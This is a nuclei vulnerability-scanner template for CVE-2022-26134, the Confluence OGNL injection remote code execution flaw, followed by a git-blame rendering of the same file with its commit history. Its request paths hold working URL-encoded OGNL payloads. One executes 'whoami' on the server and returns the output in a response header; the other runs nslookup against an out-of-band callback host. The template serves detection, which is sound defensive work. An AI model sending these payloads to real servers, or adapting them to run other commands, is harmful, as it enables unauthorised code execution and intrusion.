nuclei-templates/cves/2022/CVE-2022-26134.yaml

id: CVE-2022-26134

info:
  name: Confluence - Remote Code Execution via OGNL template injection
  author: pdteam,jbertman
  severity: critical
  description: |
    Critical severity unauthenticated remote code execution vulnerability in Confluence Server and Data Center.
  reference:
    - https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
    - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
    - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
    - https://jira.atlassian.com/browse/CONFSERVER-79016
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-26134
    cwe-id: CWE-74
  metadata:
    shodan-query: http.component:"Atlassian Confluence"
  tags: cve,cve2022,confluence,rce,ognl,oast,cisa

requests:
  - method: GET
    path:
      - "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
      - "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"

    stop-at-first-match: true
    req-condition: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'contains(to_lower(all_headers_1), "x-cmd-response:")'

      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(to_lower(response_2), "confluence")'
        condition: and

    extractors:
      - type: kval
        part: header
        kval:
          - "x_cmd_response"
Added CVE-2022-26134 (Confluence - Remote Code Execution) (#4527) * Added CVE-2022-26134 (Confluence - Remote Code Execution) * Added additional word matcher * added additional metadata 2022-06-03 20:11:56 +00:00			`id: CVE-2022-26134`

			`info:`
			`name: Confluence - Remote Code Execution via OGNL template injection`
Add HTTP detector for CVE-2022-26134 (#4528) * Add HTTP detector for CVE-2022-26134 * Fix typo * Added additional non out-of-band based detection + extractors Co-Authored-By: jbertman <4664954+jbertman@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: jbertman <4664954+jbertman@users.noreply.github.com> 2022-06-03 21:07:36 +00:00			`author: pdteam,jbertman`
Added CVE-2022-26134 (Confluence - Remote Code Execution) (#4527) * Added CVE-2022-26134 (Confluence - Remote Code Execution) * Added additional word matcher * added additional metadata 2022-06-03 20:11:56 +00:00			`severity: critical`
			`description: \|`
			`Critical severity unauthenticated remote code execution vulnerability in Confluence Server and Data Center.`
			`reference:`
			`- https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis`
			`- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html`
Add HTTP detector for CVE-2022-26134 (#4528) * Add HTTP detector for CVE-2022-26134 * Fix typo * Added additional non out-of-band based detection + extractors Co-Authored-By: jbertman <4664954+jbertman@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: jbertman <4664954+jbertman@users.noreply.github.com> 2022-06-03 21:07:36 +00:00			`- https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/`
Auto Generated CVE annotations [Sat Jun 4 09:18:35 UTC 2022] :robot: 2022-06-04 09:18:35 +00:00			`- https://jira.atlassian.com/browse/CONFSERVER-79016`
Added CVE-2022-26134 (Confluence - Remote Code Execution) (#4527) * Added CVE-2022-26134 (Confluence - Remote Code Execution) * Added additional word matcher * added additional metadata 2022-06-03 20:11:56 +00:00			`classification:`
Auto Generated CVE annotations [Wed Jun 15 07:24:08 UTC 2022] :robot: 2022-06-15 07:24:08 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Added CVE-2022-26134 (Confluence - Remote Code Execution) (#4527) * Added CVE-2022-26134 (Confluence - Remote Code Execution) * Added additional word matcher * added additional metadata 2022-06-03 20:11:56 +00:00			`cve-id: CVE-2022-26134`
Auto Generated CVE annotations [Wed Jun 15 07:24:08 UTC 2022] :robot: 2022-06-15 07:24:08 +00:00			`cwe-id: CWE-74`
Auto Generated CVE annotations [Sat Jun 4 09:18:35 UTC 2022] :robot: 2022-06-04 09:18:35 +00:00			`metadata:`
			`shodan-query: http.component:"Atlassian Confluence"`
Added cisa tags to CVE-2022-26134 2022-06-06 15:05:03 +00:00			`tags: cve,cve2022,confluence,rce,ognl,oast,cisa`
Added CVE-2022-26134 (Confluence - Remote Code Execution) (#4527) * Added CVE-2022-26134 (Confluence - Remote Code Execution) * Added additional word matcher * added additional metadata 2022-06-03 20:11:56 +00:00
			`requests:`
			`- method: GET`
			`path:`
Add HTTP detector for CVE-2022-26134 (#4528) * Add HTTP detector for CVE-2022-26134 * Fix typo * Added additional non out-of-band based detection + extractors Co-Authored-By: jbertman <4664954+jbertman@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: jbertman <4664954+jbertman@users.noreply.github.com> 2022-06-03 21:07:36 +00:00			`- "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"`
Added CVE-2022-26134 (Confluence - Remote Code Execution) (#4527) * Added CVE-2022-26134 (Confluence - Remote Code Execution) * Added additional word matcher * added additional metadata 2022-06-03 20:11:56 +00:00			`- "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"`

Add HTTP detector for CVE-2022-26134 (#4528) * Add HTTP detector for CVE-2022-26134 * Fix typo * Added additional non out-of-band based detection + extractors Co-Authored-By: jbertman <4664954+jbertman@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: jbertman <4664954+jbertman@users.noreply.github.com> 2022-06-03 21:07:36 +00:00			`stop-at-first-match: true`
			`req-condition: true`
			`matchers-condition: or`
Added CVE-2022-26134 (Confluence - Remote Code Execution) (#4527) * Added CVE-2022-26134 (Confluence - Remote Code Execution) * Added additional word matcher * added additional metadata 2022-06-03 20:11:56 +00:00			`matchers:`
Add HTTP detector for CVE-2022-26134 (#4528) * Add HTTP detector for CVE-2022-26134 * Fix typo * Added additional non out-of-band based detection + extractors Co-Authored-By: jbertman <4664954+jbertman@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: jbertman <4664954+jbertman@users.noreply.github.com> 2022-06-03 21:07:36 +00:00			`- type: dsl`
			`dsl:`
			`- 'contains(to_lower(all_headers_1), "x-cmd-response:")'`
Added CVE-2022-26134 (Confluence - Remote Code Execution) (#4527) * Added CVE-2022-26134 (Confluence - Remote Code Execution) * Added additional word matcher * added additional metadata 2022-06-03 20:11:56 +00:00
Add HTTP detector for CVE-2022-26134 (#4528) * Add HTTP detector for CVE-2022-26134 * Fix typo * Added additional non out-of-band based detection + extractors Co-Authored-By: jbertman <4664954+jbertman@users.noreply.github.com> Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: jbertman <4664954+jbertman@users.noreply.github.com> 2022-06-03 21:07:36 +00:00			`- type: dsl`
			`dsl:`
			`- 'contains(interactsh_protocol, "dns")'`
			`- 'contains(to_lower(response_2), "confluence")'`
			`condition: and`

			`extractors:`
			`- type: kval`
			`part: header`
			`kval:`
			`- "x_cmd_response"`